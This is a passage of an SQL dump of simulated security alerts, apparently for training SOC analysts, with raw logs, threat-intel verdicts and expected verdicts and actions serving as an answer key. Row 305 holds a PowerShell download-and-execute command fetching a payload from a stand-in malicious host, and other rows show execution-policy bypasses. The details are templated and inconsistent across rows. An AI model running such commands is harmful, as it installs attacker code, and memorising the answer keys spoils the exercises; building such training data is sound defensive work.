2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:35:00Z\\\",\\\"event_id\\\":\\\"ATM-TRANS-0004\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"action\\\":\\\"ATM Withdrawal Limit Manipulation\\\",\\\"transaction_id\\\":\\\"SWIFT-TRANS-8976\\\",\\\"file_hash\\\":\\\"4e5b6c7d8f9a0b1c2d3e4f5g6h7i8j9k\\\",\\\"affected_account\\\":\\\"1234567890\\\",\\\"amount\\\":\\\"50000\\\",\\\"currency\\\":\\\"USD\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.900Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:35:00Z\\\",\\\"event_id\\\":\\\"ATM-TRANS-0004\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"action\\\":\\\"ATM Withdrawal Limit Manipulation\\\",\\\"transaction_id\\\":\\\"SWIFT-TRANS-8976\\\",\\\"file_hash\\\":\\\"4e5b6c7d8f9a0b1c2d3e4f5g6h7i8j9k\\\",\\\"affected_account\\\":\\\"1234567890\\\",\\\"amount\\\":\\\"50000\\\",\\\"currency\\\":\\\"USD\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.900Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:35:00Z\\\",\\\"event_id\\\":\\\"ATM-TRANS-0004\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"action\\\":\\\"ATM Withdrawal Limit Manipulation\\\",\\\"transaction_id\\\":\\\"SWIFT-TRANS-8976\\\",\\\"file_hash\\\":\\\"4e5b6c7d8f9a0b1c2d3e4f5g6h7i8j9k\\\",\\\"affected_account\\\":\\\"1234567890\\\",\\\"amount\\\":\\\"50000\\\",\\\"currency\\\":\\\"USD\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(302, 'Suspicious Process Execution Detected', 'high', 'CrowdStrike', 'A suspicious process was executed on a host using a known LOLBin technique. The executed script attempted to connect to a known Command and Control (C2) server.', 'Malware', 'T1218', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-01T15:24:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"hostname\":\"workstation-05\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"domain\":\"malicious-c2.example.com\"}', '2026-01-01 23:58:23', '2026-02-17 22:30:25', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected machine\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for C2 activities\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with malware\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The process used a known LOLBin for execution and attempted to communicate with a malicious C2 server, confirming the malware presence.\"}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(303, 'Phishing Email with Malicious Link Detected', 'critical', 'Proofpoint', 'A phishing email was received containing a malicious link designed to harvest credentials. The email used a spoofed domain similar to a trusted one.', 'Phishing', 'T1566', 1, 'investigating', 225, '{\"timestamp\":\"2023-10-02T09:15:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"192.168.1.45\",\"username\":\"asmith\",\"hostname\":\"email-server\",\"email_sender\":\"admin@trusfed-business.com\",\"url\":\"http://malicious-link.example.com\"}', '2026-01-01 23:41:20', '2026-03-16 03:19:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"IP associated with multiple phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"admin@trusfed-business.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"OpenPhish\",\"verdict\":\"malicious\",\"details\":\"Email domain spoofing a legitimate business\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-link.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"URL linked to phishing site designed to steal credentials\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email was confirmed to be a phishing attempt due to the malicious link and spoofed domain, matching known phishing patterns.\"}', 'Advanced', 'EDR', 1, 0, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email with Malicious Link Detected\",\"date\":\"2026-02-01T20:32:18.902Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(304, 'Spear Phishing Email Detected', 'medium', 'Email Gateway', 'A spear phishing email from a malicious source, disguised as a communication from a trusted partner, was detected targeting an employee in the finance department. The email contained a malicious attachment and a suspicious link.', 'Phishing', 'T1566.002', 1, 'investigating', 225, '{\"timestamp\":\"2023-10-05T14:22:35Z\",\"email_id\":\"1234567890\",\"from\":\"finance.partner@maliciousdomain.com\",\"to\":\"john.doe@company.com\",\"subject\":\"Urgent: Q3 Financial Report\",\"attachment\":\"Q3_Report.docm\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"url\":\"http://maliciousdomain.com/securelogin\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.25\"}', '2026-01-02 04:27:59', '2026-03-16 03:07:29', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"finance.partner@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known phishing source\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Malicious macro detected\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://maliciousdomain.com/securelogin\",\"is_critical\":true,\"osint_result\":{\"source\":\"PhishTank\",\"verdict\":\"malicious\",\"details\":\"Phishing URL targeting credentials\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Blacklist\",\"verdict\":\"malicious\",\"details\":\"IP associated with known phishing campaigns\"}}],\"recommended_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Spear Phishing Email Detected\",\"date\":\"2026-02-01T20:32:18.903Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(305, 'Suspicious PowerShell Execution', 'high', 'EDR', 'A PowerShell script was executed on the compromised system. This script is suspected to be used to establish a foothold and download additional malicious payloads. The execution follows a successful phishing attempt that targeted user john.doe.', 'Execution', 'T1059.001', 1, 'Closed', 34, '{\"timestamp\":\"2023-10-02T14:23:45Z\",\"event_id\":4688,\"process_name\":\"powershell.exe\",\"command_line\":\"powershell -NoProfile -ExecutionPolicy Bypass -Command \\\"IEX(New-Object Net.WebClient).DownloadString(\'http://malicioussite.com/payload\')\\\"\",\"user\":\"john.doe\",\"source_ip\":\"192.168.1.100\",\"destination_ip\":\"203.0.113.45\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"filename\":\"malicious_script.ps1\"}', '2026-01-02 04:27:59', '2026-03-04 01:50:03', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known malicious activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"This hash is associated with a known malware sample.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious_script.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename pattern matches known malicious script naming conventions.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"User account that was targeted during the attack.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(306, 'Persistence Mechanism Established', 'high', 'Endpoint Logs', 'The attacker has established a persistence mechanism on the compromised system by creating a scheduled task and modifying registry keys. This ensures the malicious software remains active and reinitiates upon system restart.', 'Persistence', 'T1050 - New Service', 1, 'Closed', 189, '{\"timestamp\":\"2023-10-12T14:45:00Z\",\"event_type\":\"registry and scheduled task modification\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.10\",\"affected_user\":\"john.doe\",\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\maliciousApp\",\"scheduled_task\":{\"task_name\":\"SystemUpdater\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\taskhost.exe\",\"creation_time\":\"2023-10-12T14:40:00Z\"},\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\"}', '2026-01-02 04:27:59', '2026-03-04 01:51:27', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Reputation Database\",\"verdict\":\"malicious\",\"details\":\"Associated with known threat actor\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal workstation\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"Valid user account\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected by multiple AV engines as malware\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"taskhost.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Mimics legitimate Windows process\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'EDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(307, 'Unauthorized Lateral Movement Detected', 'high', 'Network Logs', 'The attacker used stolen credentials to move laterally across the network, probing for systems hosting geological data repositories. The lateral movement was detected from internal IP 192.168.1.15 to 192.168.1.20 using compromised credentials of user \'j.doe\'.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'Closed', 189, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"1001\",\"source_ip\":\"192.168.1.15\",\"destination_ip\":\"192.168.1.20\",\"username\":\"j.doe\",\"action\":\"Lateral Movement\",\"result\":\"Success\",\"external_ip\":\"203.0.113.45\",\"file_accessed\":\"\\\\\\\\192.168.1.20\\\\geodata\\\\confidential_report.docx\",\"hash\":\"b1946ac92492d2347c6235b4d2611184\"}', '2026-01-02 04:27:59', '2026-03-04 01:53:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address used in lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Target internal system hosting valuable data.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Compromised credentials used for lateral movement.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP involved in credential theft.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No known malicious activity associated with this file hash.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(308, 'Data Exfiltration Attempt', 'high', 'Firewall', 'An attempt was detected to transfer sensitive geological data out of the corporate network. The attacker, believed to be APT34, is using encrypted channels to exfiltrate data to a command and control server.', 'Exfiltration', 'T1041 - Exfiltration Over C2 Channel', 1, 'Closed', 189, '{\"timestamp\":\"2023-10-15T14:35:22Z\",\"src_ip\":\"10.1.2.15\",\"dst_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"action\":\"allowed\",\"bytes_sent\":1048576,\"bytes_received\":512,\"filename\":\"geo_data_export.zip\",\"hash\":\"f2ca1bb6c7e907d06dafe4687e579fce\",\"username\":\"jdoe\",\"url\":\"https://malicious-c2.com/exfil\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"alert_id\":\"FW-EXFIL-20231015-001\"}', '2026-01-02 04:27:59', '2026-03-04 01:54:55', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.1.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known APT34 command and control server\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"f2ca1bb6c7e907d06dafe4687e579fce\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Malicious file hash associated with data exfiltration tools\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"https://malicious-c2.com/exfil\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLhaus\",\"verdict\":\"malicious\",\"details\":\"URL associated with APT34\'s exfiltration operations\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"geo_data_export.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file likely to contain geological data\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"clean\",\"details\":\"Legitimate user account, potentially compromised\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(313, 'Suspicious PowerShell Script Execution Detected', 'high', 'Endpoint', 'A PowerShell script was executed on a critical server with unusual parameters that could be indicative of a malicious payload or reconnaissance activity.', 'Process Execution', 'T1059.001', 1, 'investigating', NULL, '{\"timestamp\":\"2023-10-14T11:35:45Z\",\"hostname\":\"finance-server-03\",\"user\":\"jdoe\",\"process_name\":\"powershell.exe\",\"cmdline\":\"powershell.exe -NoProfile -ExecutionPolicy Bypass -File \\\\\\\\192.168.1.50\\\\share\\\\suspicious.ps1\",\"file_hash\":\"b5c0b187fe309af0f4d35982fd961d7e\",\"parent_process\":\"explorer.exe\",\"pid\":4567,\"ppid\":4123,\"integrity_level\":\"High\",\"network_connections\":\"None\",\"additional_info\":{\"script_block_logging\":\"Enabled\",\"module_logging\":\"Enabled\"}}', '2026-01-02 15:31:52', '2026-02-01 20:32:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"152.82.254.41\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 152.82.254.41 reported 141 times for malicious activity. Abuse confidence score: 89%.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"service_account\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"suspicious_activity\"}', 'Intermediate', 'EDR', 1, 0, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(314, 'Port Scanning Detected from External Source', 'medium', 'Network', 'Multiple connection attempts on increasing port numbers were detected from an IP address not previously seen, suggesting a potential reconnaissance attempt.', 'Network Anomaly', 'T1046', 0, 'resolved', NULL, '{\"timestamp\":\"2023-10-14T13:47:08Z\",\"src_ip\":\"185.32.184.76\",\"src_port\":4723,\"dest_ip\":\"172.16.0.10\",\"dest_ports\":[22,23,80,443,8080],\"protocol\":\"TCP\",\"packet_count\":50,\"byte_count\":11000,\"user_agent\":\"Mozilla/5.0\",\"geo_location\":{\"country\":\"Germany\",\"city\":\"Frankfurt\"},\"additional_info\":{\"as_number\":12345,\"as_org\":\"Example ISP\"}}', '2026-01-02 13:35:26', '2026-02-01 20:32:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"221.191.155.57\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 221.191.155.57 reported 235 times for malicious activity. Abuse confidence score: 89%.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"service_account\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"suspicious_activity\"}', 'Beginner', 'NDR', 1, 0, 'OT_ICS', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(315, 'Malware Detected via Suspicious Process Execution', 'high', 'CrowdStrike', 'A suspicious process \'malware.exe\' was executed on the host \'WORKSTATION-01\'. The process has been linked to a known malware campaign targeting enterprise environments.', 'Malware', 'T1059', 1, 'Closed', 54, '{\"timestamp\":\"2026-01-02T10:23:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.2\",\"hostname\":\"WORKSTATION-01\",\"username\":\"jane.doe\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"file_path\":\"C:\\\\Users\\\\jane.doe\\\\malware.exe\"}', '2026-01-02 11:44:27', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash detected as part of a well-known malware campaign.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.2\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Source IP is part of the internal network.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jane.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Username belongs to an internal employee.\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The execution of a known malicious file indicates a real threat requiring immediate containment and investigation.\"}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
